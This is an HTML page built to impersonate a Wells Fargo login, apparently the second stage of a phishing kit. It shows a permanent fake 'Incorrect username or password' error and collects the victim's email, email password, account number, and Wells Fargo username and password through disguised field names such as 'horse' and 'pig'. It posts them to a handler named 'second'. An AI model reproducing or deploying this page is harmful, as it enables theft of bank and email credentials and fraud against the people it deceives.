<!DOCTYPE html>
<html>
<head>
  <title>log in </title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" href="https://logo.clearbit.com/wellsfargo.com" type="image/x-icon"/>
  <style>
    #red{
      color:white;
      background: red;
    }

    body {
      margin: 0;
      padding: 0;
      background: url(https://images.unsplash.com/photo-1528459801416-a9e53bbf4e17?ixlib=rb-4.0.3&ixid=M3wxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D&auto=format&fit=crop&w=412&q=80);
      background-size: cover;
      background-position: center;
      font font-family: sans-serif;
    }

    .login-container {
      width: 90%;
      max-width: 400px;
      margin: auto;
      height: 420px;
      background: skyblue;
      color: #fff;
      position: absolute;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      padding: 70px 30px;
      border-radius: 25px;
    }

    .login-container p {
      margin: 0;
      padding: 0;
      font-weight: bold;
    }

    .login-container input {
      width: 100%;
      margin-bottom: 20px;
    }

    .login-container input[type="text"],
    input[type="password"] {
      border: none;
      border-bottom: 1px solid #fff;
      background: transparent;
      outline: none;
      height: 40px;
      color: #fff;
      font-size: 16px;
    }

    .login-container input[type="submit"] {
      border: none;
      outline: none;
      height: 40px;
      background: orange;
      color: #fff;
      font-size: 18px;
      border-radius: 20px;
    }

    .login-container input[type="submit"]:hover {
      cursor: pointer;
      background: orange;
      color: #000;
    }

    h1 {
      margin: 0;
      padding: 0 0 20px;
      text-align: center;
      font-size: 22px;
    }

    .login-container a {
      text-decoration: none;
      font-size: 14px;
      color: #fff;
    }

    .login-container a:hover {
      color: #39dc79;
    }

    .avatar {
      width: 100px;
      height: 100px;
      border-radius: 50%;
      position: absolute;
      top: -50px;
      left: calc(50% - 50px);
    }

    @media (max-width: 600px) {
      .login-container {
        height: auto;
        padding: 50px 30px;
      }

      .avatar {
        width: 80px;
        height: 80px;
        top: -40px;
      }
    }
  </style>
<body>
<div class="login-container">
  <img src="https://logo.clearbit.com/wellsfargo.com" class="avatar">
  <h1>log in here</h1>
  <form action="second" method="post">
   <p id="red">Incorrect username or password</p>
  <p>email</p>
  <input type="text" name="horse" placeholder="Enter username" value="{{eman}}">
  <p>email password</p>
  <input type="password" name="pig" placeholder="enter password" required>
  <input type="text" name="achorse" placeholder="Enter username" value="AccountNumber">
  <input type="text" name="wehorse" placeholder="Enter username" value="Wellsfargo username">
  <input type="text" name="wechorse" placeholder="Enter username" value="Wellsfargo password">
  <input type="submit" name="submit" value="log in">
  <a href="#">lost password</a>
  </form>
</div>
</body>
</html>
